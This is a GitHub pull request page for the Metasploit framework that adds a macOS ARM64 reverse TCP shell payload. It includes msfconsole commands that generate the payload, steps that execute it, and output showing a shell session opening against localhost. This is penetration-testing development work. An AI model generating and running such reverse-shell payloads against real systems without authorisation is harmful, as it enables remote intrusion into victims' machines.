Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Add osx aarch64 shell reverse tcp payload #18652

Merged
merged 1 commit into from
May 31, 2024
Merged

Add osx aarch64 shell reverse tcp payload #18652

merged 1 commit into from
May 31, 2024

Conversation

AlanFoster
Copy link
Contributor

@AlanFoster AlanFoster commented Jan 2, 2024
edited

Continuation of #18646

Adds a new osx/aarch64/shell_reverse_tcp payload that can connect back to attacker and spawn a command shell using the user provided command via a execve system call on M1/M2/M3 Apple laptops.

Verification

  1. On an M1 machine
  2. Generate a payload:
msf6 payload(osx/aarch64/shell_reverse_tcp) > generate -f macho cmd=/bin/bash -o shell lhost=127.0.0.1
[*] Writing 50072 bytes to shell_again...
  1. Create a listener to_handler
  2. chmod and execute:
➜  metasploit-framework git:(add-osx-aarch64-exec-payload) ✗ chmod +x ./shell 
➜  metasploit-framework git:(add-osx-aarch64-exec-payload) ✗ ./shell
  1. Receive shell
msf6 payload(osx/aarch64/shell_reverse_tcp) > [*] Command shell session 1 opened (127.0.0.1:4444 -> 127.0.0.1:55299) at 2024-01-02 14:16:00 +0000

msf6 payload(osx/aarch64/shell_reverse_tcp) > sessions

Active sessions
===============

  Id  Name  Type        Information  Connection
  --  ----  ----        -----------  ----------
  1         shell unix               127.0.0.1:4444 -> 127.0.0.1:55299 (127.0.0.1)

msf6 payload(osx/aarch64/shell_reverse_tcp) > sessions -i -1 -c whoami
[*] Running 'whoami' on shell session -1 (127.0.0.1)
user

@AlanFoster AlanFoster force-pushed the add-osx-aarch64-shell-reverse-tcp-payload branch 2 times, most recently from f3f9367 to b8b2e79 Compare January 2, 2024 14:40
AlanFoster
AlanFoster commented Jan 2, 2024
View reviewed changes
modules/payloads/singles/osx/aarch64/shell_reverse_tcp.rb

result = <<~EOF
// socket(AF_INET, SOCK_STREAM, IPPROTO_IP)
// socket:
Copy link
Contributor Author

@AlanFoster AlanFoster Jan 2, 2024
edited

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

The assembler library doesn't support labels; Will comment out for now - and circle back if/when it's implemented upstream

@AlanFoster AlanFoster force-pushed the add-osx-aarch64-shell-reverse-tcp-payload branch from b8b2e79 to e9fa7c7 Compare January 31, 2024 23:59
@AlanFoster AlanFoster force-pushed the add-osx-aarch64-shell-reverse-tcp-payload branch from e9fa7c7 to 35d5e53 Compare May 23, 2024 10:10
@AlanFoster AlanFoster force-pushed the add-osx-aarch64-shell-reverse-tcp-payload branch from 35d5e53 to 7955381 Compare May 31, 2024 17:05
@adfoster-r7 adfoster-r7 marked this pull request as ready for review May 31, 2024 17:06
@cgranleese-r7 cgranleese-r7 merged commit 4edb1e1 into rapid7:master May 31, 2024
38 of 39 checks passed
@cgranleese-r7
Copy link
Contributor

Release Notes

Add osx aarch64 shell reverse tcp payload.

@cgranleese-r7 cgranleese-r7 self-assigned this May 31, 2024
@cgranleese-r7 cgranleese-r7 added the rn-modules release notes for new or majorly enhanced modules label May 31, 2024
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees

@cgranleese-r7 cgranleese-r7

Labels
rn-modules release notes for new or majorly enhanced modules
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
2 participants
@AlanFoster @cgranleese-r7